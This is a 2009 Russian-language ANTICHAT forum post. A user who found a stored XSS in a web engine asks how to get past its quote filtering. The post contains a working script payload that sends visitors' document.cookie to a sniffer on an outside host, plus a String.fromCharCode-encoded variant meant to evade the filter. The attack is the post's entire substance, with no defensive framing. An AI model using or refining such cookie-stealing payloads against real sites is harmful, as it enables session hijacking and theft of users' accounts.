HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Обойти фильтрацию кавычек в XSS
   
 
 
Опции темы Поиск в этой теме Опции просмотра
Предыдущая Предыдущее сообщение   Следующее сообщение Следующая

Обойти фильтрацию кавычек в XSS
  #1  
Старый 25.03.2009, 01:48
FaR-G9
Участник форума
Регистрация: 19.12.2006
Сообщений: 159
С нами: 10207557

Репутация: 64
По умолчанию Обойти фильтрацию кавычек в XSS
Нашел активную XSS на одном движке, только там фильтруются кавычки, попытался обойти и у меня возник такой вопрос

почему закодированная КСС не выполняется?
те так у меня работает отправка куков
Цитата:
<script>img = new Image(); img.src = "http://hacker-pro.ru/sniffer/Ы.gif?"+document.cookie;</script>
а вот так нет
Цитата:
<script>img = new Image(); img.src = String.fromCharCode(34,104,116,116,112,58,47,47,10 4,97,99,107,101,114,45,112,114,111,46,114,117,47,1 15,110,105,102,102,101,114,47,110,56,55,49,46,103, 105,102,63,34)+document.cookie;</script>
𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием
 



Предыдущая тема Следующая тема
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Xss для новичков Micr0b Уязвимости 79 06.07.2018 22:05
Можно ли обойти фильтрацию спецсимволов в mssql. vmn Уязвимости 4 22.12.2006 01:48
Обойти фильтрацию! Utochka Уязвимости 6 02.02.2006 11:33
Cross Site Scripting FAQ k00p3r Уязвимости 6 12.06.2005 16:23
Как обойти фильтрацию по "маске"? (На примере форума http://www.securitylab.ru/forum) boffin Уязвимости CMS / форумов 7 03.04.2005 15:39



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.